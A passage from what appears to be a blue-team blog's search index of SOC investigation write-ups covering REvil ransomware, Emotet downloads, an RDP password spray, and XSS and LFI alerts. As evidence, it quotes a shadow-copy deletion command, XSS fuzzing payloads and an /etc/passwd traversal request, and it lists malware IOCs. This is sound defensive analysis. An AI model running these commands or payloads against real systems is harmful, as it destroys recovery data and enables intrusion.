RBCD, and escalating to domain administrator via AD CS certificate abuse.","title":"ELK-Perfect Survey","type":"blue_team"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/kerberoasting/","section":"Tags","summary":"","title":"Kerberoasting","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/privilege-escalation/","section":"Tags","summary":"","title":"Privilege Escalation","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/rbcd/","section":"Tags","summary":"","title":"RBCD","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/sql-injection/","section":"Tags","summary":"","title":"SQL Injection","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/sqlmap/","section":"Tags","summary":"","title":"Sqlmap","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/wordpress/","section":"Tags","summary":"","title":"WordPress","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/wpscan/","section":"Tags","summary":"","title":"WPScan","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/any.run/","section":"Tags","summary":"","title":"ANY.RUN","type":"tags"},{"content":" TL;DR # An Administrator on host WIN-1RKSOVFDBN0 executed facebook assistant.exe from the Downloads folder. The process (PID 5348) created 5uizv5660t-readme.txt ransom notes across multiple user profile directories, confirming active ransomware deployment. A child PowerShell process (PID 1860) executed command that shadow copy deletion via WMI - a standard ransomware anti-recovery technique. The executable hash was confirmed on VirusTotal as ransomware.sodinokibi/sodin (REvil). External\nInitial Triage # I started the investigation in Kibana - the visualization and search interface for the ELK stack, which ingests Windows event logs via Sysmon. Since the scenario involved a ransomware attack, I began by examining the event.code field distribution, expecting a high volume of Sysmon Event ID 11 events - the event type generated whenever a process writes a new file to disk.\nThe field summary confirmed Event ID 11 dominated at 64.6% of 1,153 records. I pivoted to examining rare values of winlog.event_data.TargetFilename to identify what files were being created across the system.\nThe table immediately surfaced 5uizv5660t-readme.txt written across an unusually wide range of directories - C:\\Users\\Default\\Desktop\\\n- C:\\Users\\Default\\Documents\\\n- C:\\Users\\Default\\Downloads\\\n- C:\\Users\\Default\\Music\\\n- C:\\Users\\Default\\Pictures\\\n- C:\\Users\\Default\\Favorites\\\n- C:\\Users\\Default\\Links\\\n- C:\\Users\\Default\\Saved Games\\\nand others including C:\\Users\\Administrator\\Desktop\\ and C:\\Users\\Administrator\\Downloads\\. A ransom note dropped uniformly across all user profile subdirectories is a definitive ransomware indicator. I noted the earliest timestamps were 2023-09-04, establishing the infection date.\nInitial Execution # To identify which process created the ransom notes, I expanded one of the FileCreate events for 5uizv5660t-readme.txt and examined the originating image and process ID.\nThe expanded document showed the responsible process was C:\\Users\\Administrator\\Downloads\\facebook assistant.exe running as WIN-1RKSOVFDBN0\\Administrator with PID 5348, created at 2023-09-07 16:09:59. The file was executed directly from the Administrator\u0026rsquo;s Downloads folder with High integrity level. I extracted the hash from winlog.event_data.Hashes:\n1SHA1=E5D8D5EECF7957996485CBC1CDBEAD9221672A1A 2MD5=4D84641B65D8BB6C3EF03BF59434242D 3SHA256=B8D7FB4488C0556385498271AB9FFFDF0EB38BB2A330265D9852E3A6288092AA 4IMPHASH=C686E5B9F7A178EB79F1CF16460B6A18 Shadow Copy Deletion # I searched for processes spawned by PID 5348 to identify any child activity, filtering on winlog.event_data.ParentProcessId.keyword : \u0026quot;5348\u0026quot; with event.code : 1.\nThe query returned 1 hit - a PowerShell process (PID 1860) launched at 2023-09-07 16:09:53 with a base64-encoded command line. Decoding the payload revealed:\n1Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} This command enumerates all Volume Shadow Copies via WMI and deletes them - the standard technique used by ransomware to prevent victims from restoring files from Windows built-in snapshots. The PowerShell binary was signed by Microsoft Corporation, confirming the attacker used a legitimate system binary (LOLBin) to execute the destructive command.\nMalware Confirmation # I submitted the SHA256 B8D7FB4488C0556385498271AB9FFFDF0EB38BB2A330265D9852E3A6288092AA to VirusTotal for static reputation analysis.\n66/72 vendors flagged the sample as ransomware.sodinokibi/sodin - this is REvil, a ransomware-as-a-service family operated by the threat group GOLD SOUTHFIELD.\nC2 Infrastructure # I submitted the sample to any.run for dynamic analysis. The sandbox captured DNS resolution activity showing the sample contacted the Tor onion address:\n1aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion This domain is the REvil payment and victim portal hosted on the Tor network, used to deliver decryption keys upon ransom payment. Its presence confirms the sample successfully attempted to beacon out to REvil C2 infrastructure.\nIOCs # Hosts\n- WIN-1RKSOVFDBN0 - compromised host, Windows Server 2019 Standard Evaluation\nFiles\n- C:\\Users\\Administrator\\Downloads\\facebook assistant.exe - SHA256: B8D7FB4488C0556385498271AB9FFFDF0EB38BB2A330265D9852E3A6288092AA\n- 5uizv5660t-readme.txt - ransom note dropped across all user profile directories\nDomains\n- aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion - REvil Tor payment portal\nAccounts\n- WIN-1RKSOVFDBN0\\Administrator - account used to execute ransomware\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef c2 fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef mal fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; A([WIN-1RKSOVFDBN0Administrator]):::default --\u003e B[2023-09-07 16:09:53 - facebook assistant.exeexecuted from DownloadsPID 5348, High integrity]:::access B --\u003e C[2023-09-07 16:09:53 - PowerShell spawnedPID 1860 - encoded command]:::exec C --\u003e D[Shadow copy deletionGet-WmiObject Win32_ShadowcopyForEach Delete]:::exec subgraph Ransomware [Ransomware Activity] D --\u003e E[2023-09-07 16:09:59 - FileCreate Event ID 115uizv5660t-readme.txtC:\\Users\\Default\\* - all subdirs]:::mal E --\u003e F[Ransom note dropped acrossAdministrator and Defaultuser profile directories]:::mal end subgraph C2 [C2 Beaconing] F --\u003e G[DNS resolutionaplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onionREvil Tor payment portal]:::c2 end ","date":"April 7, 2026","externalUrl":null,"permalink":"/blue_team/elk-revil/","section":"","summary":"An administrator executed facebook assistant.exe on a Windows Server 2019 host, which dropped REvil ransomware (Sodinokibi), spawned a PowerShell process that deleted Volume Shadow Copies, and dropped ransom notes across multiple user profile directories.","title":"ELK-REvil - GOLD SOUTHFIELD","type":"blue_team"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/emotet/","section":"Tags","summary":"","title":"Emotet","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/ids/","section":"Tags","summary":"","title":"IDS","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/password-spraying/","section":"Tags","summary":"","title":"Password Spraying","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/revil/","section":"Tags","summary":"","title":"REvil","type":"tags"},{"content":" TL;DR # A victim host at 147.32.84.165 was observed downloading multiple malicious executables from the attacker-controlled domain nocomcom.com (147.32.84.165) via HTTP. The downloads included fjuivgfhurew.exe (Emotet/Lethic), client.exe (Yakes/Barys), mousedriver.exe (Razy/Dugenpal), hmm.exe (Zusy/Acne - ransomware+worm), and a configuration file kx4.txt (Dacic/VBAgent). All five unique file hashes extracted from Zeek file logs were confirmed malicious on VirusTotal with detection rates ranging from 57 to 65 out of 72 vendors.\nInitial Triage # I started the investigation in Splunk - a SIEM platform that ingests and indexes log data from multiple sources, enabling search, correlation, and visualization of security events. My first step was examining the eventtype field distribution across all events to identify which log sources and categories were present.\nThe field summary showed 6 distinct values covering 3.492% of all events. The suricata_eve_dns type dominated with 85.2% of those events, but the entry that drew my attention was suricata_eve_ids_attack with 532 events (2.151%) - Suricata is a network-based IDS that generates ids_attack events when traffic matches known malicious signatures, making this the highest-priority category to investigate first.\nFile Downloads # I ran a query against suricata_eve_ids_attack events to identify what was being downloaded and by whom:\n1index=* sourcetype=suricata eventtype=suricata_eve_ids_attack 2| stats values(dest_ip) values(http.http_user_agent) values(http.url) by src_ip The results showed src IP 195.88.191.59 communicating with dest 147.32.84.165 (the victim host). The User-Agent was Mozilla/4.0 (compatible; MSIE 6.0.2900.2180; Windows NT 5.1.2600) - a spoofed Internet Explorer 6 string consistent with malware using a hardcoded legacy UA rather than a real browser. The URLs in the request confirmed active malware staging: /bl/chooseee.exe, /bl/client.exe, /kx4.txt, /sv/fjuivgfhurew.exe, and /temp/3425.exe.\nTo confirm the full download timeline, I pivoted to HTTP logs filtered by the attacker IP:\n1index=* src_ip=\u0026#34;195.88.191.59\u0026#34; | table _time, dest_ip, http.hostname, http.url The results confirmed all downloads resolved through the domain nocomcom.com (147.32.84.165). The earliest requests for /kx4.txt appeared at 09:06:50, followed by /temp/3425.exe at 09:01:40, then /bl/client.exe and /sv/fjuivgfhurew.exe in the 11:02 window, suggesting a staged download sequence where kx4.txt likely served as a configuration or URL list for subsequent payload retrieval.\nFile Analysis # To extract file hashes from the downloaded transfers, I queried Zeek file logs - Zeek is a network analysis framework that reconstructs file transfers from packet captures and computes cryptographic hashes:\n1index=* sourcetype=zeek:files tx_hosts=\u0026#34;195.88.191.59\u0026#34; 2| table _time seen_bytes SHA256 sha1 sha256 The query returned 5 unique SHA256 hashes across 6 transfer events, with one hash (564048b35da9d447f2e861d5896d908d) appearing twice at 09:06:50 and 10:10:21 - indicating the same file was downloaded on two separate occasions. I submitted all five unique hashes to VirusTotal for static reputation checks.\nfjuivgfhurew.exe (SHA256: 00f15e22ab95632fc51d09f179eb22f5a36e92f6e99390f08a4161f2f93e1717, 91 KB) was flagged by 65/72 vendors as trojan.emotetu/lethic - Emotet is a modular banking trojan and malware loader historically used to deliver secondary payloads.\nmousedriver.exe (SHA256: 2ed4a4ad94c6148b013aecacae783748d51d429de4f1d477a79bbf025d03d47a, 27.5 KB) was flagged by 61/71 vendors as trojan.razy/dugenpal.\nclient.exe (SHA256: 6d8353efda8438bf2dff79d6a4c174d5593450858c74c45c6f2718927546c1bd, 91.5 KB) was flagged by 57/72 vendors as trojan.yakes/barys, with the spreader behavioral tag indicating self-propagation capability.\nkx4.txt (SHA256: 6fbc4d506f4d4e0a64ca09fd826408d3103c1a258c370553583a07a4cb9a6530, 36.5 KB) was flagged by 64/71 vendors as trojan.dacic/vbagent despite its .txt extension - the hosts-modifier, spreader, and calls-wmi behavioral tags confirm this is an executable masquerading as a text file.\nhmm.exe (SHA256: 617520dbb4c29f0d072ffb6f9f637c558dc224441d235943957aaa8f5de8db6f, 225.5 KB) was flagged by 62/72 vendors as trojan.zusy/acne with threat categories of trojan, ransomware, and worm - making it the most dangerous payload in the set.\nIOCs # IPs\n- 195.88.191.59 - attacker IP, malware distribution server\n- 147.32.84.165 - victim host\nDomains\n- nocomcom.com - attacker-controlled malware staging domain\nFiles\n- fjuivgfhurew.exe - SHA256: 00f15e22ab95632fc51d09f179eb22f5a36e92f6e99390f08a4161f2f93e1717\n- mousedriver.exe - SHA256: 2ed4a4ad94c6148b013aecacae783748d51d429de4f1d477a79bbf025d03d47a - - client.exe - SHA256: 6d8353efda8438bf2dff79d6a4c174d5593450858c74c45c6f2718927546c1bd - kx4.txt - SHA256: 6fbc4d506f4d4e0a64ca09fd826408d3103c1a258c370553583a07a4cb9a6530\n- hmm.exe - SHA256: 617520dbb4c29f0d072ffb6f9f637c558dc224441d235943957aaa8f5de8db6f\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef c2 fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef mal fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; A([195.88.191.59Attacker]):::c2 --\u003e B[Aug 10 09:01:40 - HTTP GET /temp/3425.exenocomcom.com]:::access B --\u003e C[Aug 10 09:06:50 - HTTP GET /kx4.txtDacic/VBAgent - hosts-modifier, spreader]:::mal C --\u003e D[Aug 10 09:06:56 - HTTP GET /bl/client.exeYakes/Barys trojan - spreader]:::mal D --\u003e E[Aug 10 09:07:17 - HTTP GET /bl/chooseee.exedownload confirmed via Zeek]:::mal E --\u003e F[Aug 10 10:10:21 - HTTP GET /kx4.txtsecond download of same payload]:::mal subgraph LateStage [Late Stage Downloads] F --\u003e G[Aug 10 11:02:11 - HTTP GET /bl/client.exere-download]:::exec G --\u003e H[Aug 10 11:02:21 - HTTP GET /sv/fjuivgfhurew.exeEmotet/Lethic trojan]:::exec end subgraph Payloads [Confirmed Malicious Payloads - VirusTotal] H --\u003e I[fjuivgfhurew.exe - Emotet 65/72]:::mal H --\u003e J[mousedriver.exe - Razy 61/71]:::mal H --\u003e K[client.exe - Yakes/Barys 57/72]:::mal H --\u003e L[kx4.txt - Dacic/VBAgent 64/71]:::mal H --\u003e M[hmm.exe - Zusy/Acne ransomware 62/72]:::mal end ","date":"April 7, 2026","externalUrl":null,"permalink":"/blue_team/splunk-nerisbot/","section":"","summary":"A victim host downloaded multiple malicious executables via HTTP, including Emotet, ransomware, and trojan payloads, detected through Suricata IDS alerts and confirmed malicious via VirusTotal.","title":"Splunk-NerisBot","type":"blue_team"},{"content":" TL;DR # An attacker operating from 192.168.1.60 (WorkstationName: kali) conducted a password spraying attack against dev.cyberdefenders.org over RDP. The attack generated 4,302 failed logon attempts (Event ID 4625) over approximately 5 minutes and 48 seconds, targeting multiple usernames via NTLM LogonType 3. Event ID 261 confirmed active RDP-Tcp connection attempts throughout the attack window. Following the brute-force, Event ID 1149 (RDP authentication success) recorded six compromised accounts: squadronwar, interjectaerobics, infestedmerchant, turtledoverecall, harrashusky, and administrator - the last of which was accessed again 11 minutes after the initial compromise.\nInitial Triage # I started the investigation in Splunk by examining the event.code field distribution across all ingested Windows Security and TerminalServices logs to identify the dominant activity type.\nEvent ID 4625 (An account failed to log on) led with 4,312 occurrences at 17.956% of all events - a volume far exceeding normal authentication noise. Also notable was Event ID 261 with 1,983 events (8.258%), which corresponds to Microsoft-Windows-TerminalServices-RemoteConnectionManager logging each inbound RDP-Tcp connection attempt. The combination of mass 4625 and high 261 counts immediately pointed to an RDP brute-force or password spraying campaign.\nAttack Source and Scope # I pivoted to identify the source IP behind the 4625 events, grouping by winlog.event_data.IpAddress and winlog.event_data.LogonType.\nThe table confirmed 192.168.1.60 as the sole significant attacker, responsible for 4,302 failed LogonType 3 attempts in August 2022 - LogonType 3 is a network logon, consistent with remote authentication over RDP/SMB. Two other IPs (192.168.1.51 and 192.168.1.61) each produced 3-5 attempts, consistent with legitimate activity. Expanding one of the 4625 events from 192.168.1.60 confirmed the attack profile.\nThe event showed TargetUserName: administrator, AuthenticationPackageName: NTLM, LogonProcessName: NtLmSsp, WorkstationName: kali, and FailureReason: %%2313 (unknown username or bad password). The kali workstation name is a direct indicator of an attacker-controlled Linux machine running a spraying tool.\nAttack Timeline # To establish the duration of the attack I examined the first and last 4625 events from 192.168.1.60.\nThe first failed logon was recorded at 2022-08-01T16:29:09.460Z and the last at 2022-08-01T16:34:57.623Z - a total attack window of 5 minutes and 48 seconds. This short, high-volume window across multiple usernames is characteristic of T1110.003 - Password Spraying, where an attacker cycles a small number of passwords across many accounts to avoid lockout thresholds.\nConcurrent with the 4625 flood, Event ID 261 was generated at 2022-08-01T16:34:57.224Z - one second before the last failed logon - confirming the RDP-Tcp listener on dev.cyberdefenders.org was actively receiving and processing each connection attempt from 192.168.1.60.\nCompromised Accounts # I filtered for Event ID 1149 - logged by Microsoft-Windows-TerminalServices-RemoteConnectionManager when a user successfully authenticates to an RDP session - to identify which accounts the attacker successfully accessed.\nSix accounts authenticated successfully from 192.168.1.60: squadronwar at 16:32:34, interjectaerobics at 16:32:44, infestedmerchant at 16:32:53, turtledoverecall at 16:33:03, harrashusky at 16:33:13, and administrator at 16:34:57. The administrator account was then accessed again at 16:46:10 - 11 minutes after the initial compromise - suggesting the attacker returned for a second interactive RDP session under the highest-privilege account on the host.\nIOCs # Value Description 192.168.1.60 attacker, WorkstationName: kali dev.cyberdefenders.org targeted host administrator compromised account squadronwar compromised account interjectaerobics compromised account infestedmerchant compromised account turtledoverecall compromised account harrashusky compromised account Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef success fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef mal fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; A([192.168.1.60 - kali]):::default --\u003e B[2022-08-01 16:29:09 - First 4625Password spray beginsNTLM LogonType 3]:::exec B --\u003e C[16:29 - 16:34 - 4302 failed logonsEvent ID 4625multiple usernames targeted]:::exec C --\u003e D[16:34:57.224 - Event ID 261RDP-Tcp connection receiveddev.cyberdefenders.org]:::access subgraph Spray [Successful Authentications - Event ID 1149] D --\u003e E[16:32:34 - squadronwar]:::success D --\u003e F[16:32:44 - interjectaerobics]:::success D --\u003e G[16:32:53 - infestedmerchant]:::success D --\u003e H[16:33:03 - turtledoverecall]:::success D --\u003e I[16:33:13 - harrashusky]:::success D --\u003e J[16:34:57 - administrator]:::success end J --\u003e K[16:46:10 - administratorsecond RDP session11 minutes later]:::mal ","date":"April 7, 2026","externalUrl":null,"permalink":"/blue_team/splunk-t1110-003/","section":"","summary":"An attacker from 192.168.1.60 (Kali) conducted a 5-minute RDP password spraying attack against dev.cyberdefenders.org, generating 4302 failed logon attempts across multiple usernames, and successfully authenticated as administrator and five other accounts via RDP.","title":"Splunk-T1110-003","type":"blue_team"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/suricata/","section":"Tags","summary":"","title":"Suricata","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/tor/","section":"Tags","summary":"","title":"Tor","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/wmi/","section":"Tags","summary":"","title":"WMI","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/zeek/","section":"Tags","summary":"","title":"Zeek","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/broken-access-control/","section":"Tags","summary":"","title":"Broken Access Control","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/command-injection/","section":"Tags","summary":"","title":"Command Injection","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/digitalocean/","section":"Tags","summary":"","title":"DigitalOcean","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/false-positive/","section":"Tags","summary":"","title":"False Positive","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/idor/","section":"Tags","summary":"","title":"IDOR","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/injection/","section":"Tags","summary":"","title":"Injection","type":"tags"},{"content":" Alert # 1EventID : 116 2Event Time : Feb, 26, 2022, 06:56 PM 3Rule : SOC166 - Javascript Code Detected in Requested URL 4Level : Security Analyst 5Hostname : WebServer1002 6Destination IP Address : 172.16.17.17 7Source IP Address : 112.85.42.13 8HTTP Request Method : GET 9Requested URL : https://172.16.17.17/search/?q=\u0026lt;$script\u0026gt;javascript:$alert(1)\u0026lt;$/script\u0026gt; 10User-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 11Alert Trigger Reason : Javascript code detected in URL 12Device Action : Allowed Identification # Is the traffic coming from outside? # The source IP 112.85.42.13 is an external address belonging to China Unicom Jiangsu province network (AS4837, Nanjing, China). The destination 172.16.17.17 is an internal address. Traffic direction is Internet to Company Network. This was confirmed not to be a planned test.\nIs the source malicious? # AbuseIPDB shows the IP has been reported 45,324 times with a Confidence of Abuse of 0%. The high report volume is notable despite the low confidence score - this is a Fixed Line ISP address rather than a cloud VPS, which is less common for attacker infrastructure but not unusual for compromised residential/business connections used as proxies.\nVirusTotal returned 0/94 detections - no vendor flagged the IP as malicious. However, 1 file was detected communicating with this IP, and the community score is -15, suggesting prior negative community reports.\nWhat type of attack was attempted? # Firewall logs show eight consecutive inbound connections from 112.85.42.13 to 172.16.17.17:443 between 06:34 PM and 06:56 PM, all permitted.\nReviewing the raw log for the triggering request confirmed an XSS payload in the q parameter:\nThe full request history on the /search/ endpoint reveals a systematic XSS probing sequence - the attacker started with a benign q=test request (HTTP 200, 885 bytes) to confirm the endpoint was live, then escalated through multiple injection techniques:\n1q=test - HTTP 200 (baseline probe) 2q=prompt(8) - HTTP 302 3q=\u0026lt;img src=q onerror=prompt(8)\u0026gt; - HTTP 302 (img onerror) 4q=\u0026lt;svg\u0026gt;\u0026lt;script ?\u0026gt;alert(1) - HTTP 302 (SVG vector) 5q=\u0026lt;script\u0026gt;for((i)in(self))eval(i)(1)\u0026lt;/script\u0026gt; - HTTP 302 (obfuscated eval) 6q=\u0026lt;script\u0026gt;javascript:alert(1) - HTTP 302 (unclosed tag) 7q=\u0026lt;script\u0026gt;javascript:alert(1)\u0026lt;/script\u0026gt; - HTTP 302 (final payload) This pattern is consistent with manual or semi-automated XSS fuzzing - testing multiple bypass techniques to find one that evades server-side filtering.\nDid anyone else get targeted? # All connections targeted exclusively 172.16.17.17 on the /search/ endpoint. No other internal hosts were involved.\nDid the attack succeed? # No. Only the initial baseline request (q=test) returned HTTP 200 with a response body of 885 bytes. Every subsequent XSS payload returned HTTP 302 with a response size of 0 - indicating the server redirected the request without processing the payload, consistent with server-side input sanitization or a WAF blocking the injection. No successful script execution was observed.\nTriage Decision # True Positive. The attack did not succeed - all XSS payloads were blocked with HTTP 302. No Tier 2 escalation required.\nWhat is the impact level? # Low. The server correctly rejected all injection payloads. However, the attacker successfully fingerprinted the endpoint as live and tested multiple bypass vectors, which may inform follow-up attempts with more advanced payloads.\nContainment # Is the attacker still active? # The last observed request was at 06:56 PM on Feb 26, 2022. No further connections from 112.85.42.13 were observed after the triggering event.\nIs the vulnerable endpoint still exposed? # The /search/ endpoint on 172.16.17.17 remains externally accessible. While the current sanitization blocked these specific payloads, the endpoint should be reviewed for completeness of input validation against advanced bypass techniques.\nActions taken # 112.85.42.13 was blocked at the firewall. The /search/ endpoint was flagged for the application security team to review input validation coverage.\nIOCs # IPs\n- 112.85.42.13 - attacker IP - 172.16.17.17 - targeted IP\nURLs\n- hxxps://172.16.17[.]17/search/?q= - targeted endpoint\nUser-Agent\n- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\nMITRE ATT\u0026amp;CK # Tactic Technique ID Initial Access Exploit Public-Facing Application T1190 Execution Command and Scripting Interpreter: JavaScript T1059.007 Discovery Network Service Discovery T1046 ","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-javascript-code-detected-in-requested-url/","section":"","summary":"An external IP performed XSS reconnaissance against the /search/ endpoint, cycling through multiple injection payloads. All requests except the first returned HTTP 302, indicating server-side sanitization blocked execution. The attack did not succeed.","title":"LD-Javascript Code Detected in Requested URL","type":"blue_team"},{"content":" Alert # 1EventID : 117 2Event Time : Feb, 27, 2022, 12:36 AM 3Rule : SOC167 - LS Command Detected in Requested URL 4Level : Security Analyst 5Hostname : EliotPRD 6Destination IP Address : 188.114.96.15 7Source IP Address : 172.16.17.46 8HTTP Request Method : GET 9Requested URL : https://letsdefend.io/blog/?s=skills 10User-Agent : Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0 11Alert Trigger Reason : URL Contains LS 12Device Action : Allowed Identification # Is the traffic coming from outside? # The source IP 172.16.17.46 is an internal address. The destination 188.114.96.15 resolves to letsdefend.io - a legitimate external platform. Traffic direction is Company Network to Internet.\nIs the source malicious? # The source is an internal host. The destination is a known legitimate platform.\nWhat type of attack was attempted? # No attack was attempted. The alert triggered because the detection rule matched the string ls within the word ski**ls** in the search query ?s=skills. This is a false positive caused by a substring match - the rule lacks context to distinguish the ls Linux command from the same character sequence appearing inside a legitimate word. The request is a standard blog search on letsdefend.io.\nTriage Decision # False Positive. The URL https://letsdefend.io/blog/?s=skills is a legitimate search request from an internal user to an external platform. The string ls is a substring of skills and does not represent a command injection attempt. No malicious traffic was identified.\nIOCs # None.\n","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-ls-command-detected-in-requested-url/","section":"","summary":"Alert triggered on the string ’ls’ found in a legitimate search query parameter. The traffic originated from an internal IP to letsdefend.io and contains no malicious payload. False positive - rule lacks context awareness for partial string matches.","title":"LD-LS Command Detected in Requested URL","type":"blue_team"},{"content":" Alert # 1EventID : 120 2Event Time : Mar, 01, 2022, 10:10 AM 3Rule : SOC170 - Passwd Found in Requested URL - Possible LFI Attack 4Level : Security Analyst 5Hostname : WebServer1006 6Destination IP Address : 172.16.17.13 7Source IP Address : 106.55.45.162 8HTTP Request Method : GET 9Requested URL : https://172.16.17.13/?file=../../../../etc/passwd 10User-Agent : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) 11Alert Trigger Reason : URL Contains passwd 12Device Action : Allowed Identification # Is the traffic coming from outside? # The source IP 106.55.45.162 is an external address belonging to Tencent Cloud Computing (Beijing) Co., Ltd. (AS45090, Guangzhou, Guangdong, China). The destination 172.16.17.13 is an internal address. Traffic direction is Internet to Company Network. This was confirmed not to be a planned test.\nIs the source malicious? # AbuseIPDB shows the IP has been reported 3,454 times with a Confidence of Abuse of 0%. The Data Center/Web Hosting usage type and Chinese cloud provider context are consistent with attacker-controlled VPS infrastructure.\nVirusTotal returned 0/94 detections, however the community score is -19 with 57 community comments - a strong negative signal indicating prior malicious activity reported by the community despite no vendor detections.\nWhat type of attack was attempted? # The alert triggered on a GET request to /?file=../../../../etc/passwd - a Local File Inclusion (LFI) attack using path traversal. The file parameter is used to specify a file to include server-side. By supplying ../../../../etc/passwd, the attacker attempts to traverse out of the web root and read the system\u0026rsquo;s account file, which contains usernames and can reveal service accounts and system configuration. The outdated User-Agent (MSIE 6.0 / Windows NT 5.1) is a fingerprint commonly seen in automated scanning tools.\nReviewing the raw log confirmed the request details:\n1Request URL: https://172.16.17.13/?file=../../../../etc/passwd 2Request Method: GET 3Device Action: Permitted 4HTTP Response Size: 0 5HTTP Response Status: 500 Only one connection from 106.55.45.162 was observed in the firewall logs - a single probe rather than a multi-payload enumeration campaign.\nDid anyone else get targeted? # Log review shows only 172.16.17.13 (WebServer1006) was targeted. No other internal hosts were involved.\nDid the attack succeed? # No. The server returned HTTP 500 with a response size of 0 bytes. An HTTP 500 indicates an internal server error - the application failed to process the request but did not return the file contents. A successful LFI would return HTTP 200 with a non-zero response body containing the file data. The attack did not succeed.\nTriage Decision # True Positive. A single LFI probe from an external Tencent Cloud IP was correctly allowed through to the application layer and was rejected with HTTP 500. No Tier 2 escalation required.\nWhat is the impact level? # Low. The attack did not succeed and no data was returned. However, the HTTP 500 response indicates the application attempted to process the file parameter rather than rejecting it at input validation - the endpoint may be vulnerable to LFI with a different traversal depth or encoding.\nContainment # Is the attacker still active? # Only one connection was logged at 10:10 AM on Mar 01, 2022. No follow-up requests were observed.\nIs the vulnerable endpoint still exposed? # The ?file= parameter on 172.16.17.13 remains exposed. The HTTP 500 response suggests the parameter reaches the filesystem layer, making it a candidate for further LFI testing with alternate traversal sequences or encoding bypasses. The endpoint should be reviewed by the application security team.\nActions taken # 106.55.45.162 was blocked at the firewall. The ?file= parameter on WebServer1006 was flagged for input validation review.\nIOCs # IPs\n- 106.55.45.162 - attacker IP (Tencent Cloud AS45090, Guangzhou, CN) URLs\n- hxxps://172.16.17[.]13/?file=../../../../etc/passwd - LFI payload\nUser-Agent\n- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\n","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-passwd-found-in-requested-url---possible-lfi-attack/","section":"","summary":"An external Tencent Cloud IP sent a single LFI request targeting /etc/passwd via path traversal. The server returned HTTP 500 with an empty response body, confirming the attack did not succeed.","title":"LD-Passwd Found in Requested URL - Possible LFI Attack","type":"blue_team"},{"content":" Alert # 1EventID : 119 2Event Time : Feb, 28, 2022, 10:48 PM 3Rule : SOC169 - Possible IDOR Attack Detected 4Level : Security Analyst 5Hostname : WebServer1005 6Destination IP Address: 172.16.17.15 7Source IP Address : 